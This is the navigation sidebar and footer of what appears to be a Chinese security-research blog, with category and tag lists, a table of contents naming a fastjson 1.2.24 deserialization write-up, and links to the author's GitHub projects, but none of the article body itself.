                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/'>漏洞复现</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/vulnhub/'>vulnhub</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/Sql-Inject/'>Sql-Inject</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
            </details>
        </div>
        
        <p>
    <details>
        <summary class="point">所有标签/数量</summary>
        
        <p>
            <i class="fa fa-angle-right"></i> Web
            <span class="badge badge-theme pull-right">11</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 漏洞复现
            <span class="badge badge-theme pull-right">9</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 渗透
            <span class="badge badge-theme pull-right">8</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 安全工具
            <span class="badge badge-theme pull-right">5</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 笔记
            <span class="badge badge-theme pull-right">32</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 软件移植
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Arm
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 主动防御
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 技巧
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Android reverse
            <span class="badge badge-theme pull-right">4</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 排错
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Waf
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Maven
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Python
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Terminal
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Docker
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Cve
            <span class="badge badge-theme pull-right">3</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Sql-inject
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Bash
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 内网
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> 信息搜集
            <span class="badge badge-theme pull-right">6</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Fuzz
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Vulnhub
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Src
            <span class="badge badge-theme pull-right">1</span>
        </p>
    
        <p>
            <i class="fa fa-angle-right"></i> Daily
            <span class="badge badge-theme pull-right">2</span>
        </p>
    
    </details>
    <div class="spacing"></div>

    <h4>Tags/标签</h4>
    <div class="hline"></div>
    <p>
        
            <a class="btn btn-theme" href='/' role="button">Web (11)</a>
        
            <a class="btn btn-theme" href='/' role="button">漏洞复现 (9)</a>
        
            <a class="btn btn-theme" href='/' role="button">渗透 (8)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">安全工具 (5)</a>
        
            <a class="btn btn-theme" href='/' role="button">笔记 (32)</a>
        
            <a class="btn btn-theme" href='/' role="button">软件移植 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">Arm (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">主动防御 (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">技巧 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Android reverse (4)</a>
        
            <a class="btn btn-theme" href='/' role="button">排错 (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Waf (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Maven (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Python (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Terminal (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Docker (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Cve (3)</a>
        
            <a class="btn btn-theme" href='/' role="button">Sql-inject (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Bash (2)</a>
        
            <a class="btn btn-theme" href='/' role="button">内网 (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">信息搜集 (6)</a>
        
            <a class="btn btn-theme" href='/' role="button">Fuzz (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Vulnhub (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Src (1)</a>
        
            <a class="btn btn-theme" href='/' role="button">Daily (2)</a>
        
    </p>
    <div class="spacing"></div>

    <h4>Article Directory/文章目录</h4>
    <div class="hline"></div>
    <p>
        <ul id="toc" class="section-nav">
<li class="toc-entry toc-h3"><a href="#fastjson指纹特征">fastjson指纹特征</a>
<ul>
<li class="toc-entry toc-h4"><a href="#fastjson-1224-反序列化导致任意命令执行漏洞">fastjson 1.2.24 反序列化导致任意命令执行漏洞</a></li>
<li class="toc-entry toc-h4"><a href="#dnslog">dnslog</a></li>
</ul>
</li>
</ul>
    </p>

</div>


    </div><!--/row -->
        
</div><!--/container -->


        <div id="footerwrap">
    <div class="container">
        <div class="row">
            <div class="col-sm-4">
                <div class="col-sm-6">
                  <p class="thuhidden"><strong>入门</strong></p>
                  <p class="thuhidden"><a href="https://github.com/tuna/mirror-web" target="blank"><em>Jekyll</em>源码</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/jekyll/in/linux" target="blank">博客搭建教程</a></p>
                  <p class="thuhidden"><a href="https://about.sentrylab.cn/news/sentry-lab-markdown-usage/" target="blank">个性化语法批注</a></p>
                  <p class="thuhidden"><a href="https://www.sentrylab.cn/blog/2019/nginx/with/jekyll-site/" target="blank">公网部署</a></p>
                  </div>

                  <div class="col-sm-6">
                  <p class="thuhidden"><strong>社区</strong></p>
                  <p class="thuhidden"><a href="/blog" target="blank">博客</a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger/tree/master/CoVV" target="blank"><em>Collection of verified vulnerabilities</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/bigger-than-bigger" target="blank"><em>Bigger than Bigger</em></a></p>
                  <p class="thuhidden"><a href="https://github.com/Bin4xin/B4xinSynchronize" target="blank"><em>B4xinSynchronize</em></a></p>
                  </div>
            </div>

        <div class="col-sm-4">
                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>开发</strong></p>
                    <p class="thuhidden"><a href="https://github.com/Bin4xin/Bin4xin" target="blank"><em>Bin4xin</em></a></p>
                    <p class="thuhidden"><a href="https://www.cloudflare.com/waf/" target="blank"><em>CloudFlare WAF</em></a></p>
                    <p class="thuhidden"><a href="https://jekyllrb.com/docs/" target="blank"><em>Jekyll</em></a></p>
                    <p class="thuhidden"><a href="https://www.markdownguide.org/" target="blank"><em>MarkDown</em></a></p>
                    <p class="share">
                    <a href="https://github.com/Bin4xin/" target="blank"><i class="fa fa-github"></i></a>
                    <a href="https://twitter.com/Bin4xin"><i class="fa fa-twitter" target="blank"></i></a>
                    <a href="#"><i class="fa fa-facebook" target="blank"></i></a>
                    </p>
                  </div>

                  <div class="col-sm-6">
                    <p class="thuhidden"><strong>关于</strong></p>
                    <p class="thuhidden"><a href="https://about.sentrylab.cn/" target="blank">近期研究</a></p>
                    <p class="thuhidden">∑ <csmall>(Visitors/times)</csmall></em></p>
                    <img src="https://profile-counter.glitch.me/bin4xin.github.io/count.svg" style="max-width:100%;">
                  </div>
            </div>

        <div class="col-sm-4">
          
          <picture>
  <img src="/assets/img/logo-small@3x.jpg" srcset="/assets/img/logo-small@3x.png 1x" />
  </picture>

        </div>
        </div><!--/row -->
      <p class="thuhidden">© 2019-2021 SentrySec, Lab. Build by Jekyll under the terms of the MIT License.</p>
    </div><!--/container -->
</div><!--/footerwrap -->
    </body>
</html>